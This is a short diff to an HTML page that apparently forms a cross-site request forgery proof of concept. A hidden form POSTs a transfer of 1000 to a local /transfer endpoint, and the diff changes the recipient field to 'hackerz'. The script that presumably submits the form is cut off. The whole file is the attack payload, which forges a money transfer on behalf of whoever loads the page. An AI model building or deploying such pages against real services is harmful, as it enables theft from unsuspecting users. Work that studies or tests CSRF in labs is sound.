--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
 </head>
 <body>
     <form action="http://127.0.0.1:8080/transfer" method="POST">
-        <input type="hidden" name="user_to" value="s" />
+        <input type="hidden" name="user_to" value="hackerz" />
         <input type="hidden" name="amount" value="1000" />
     </form>
     <script>
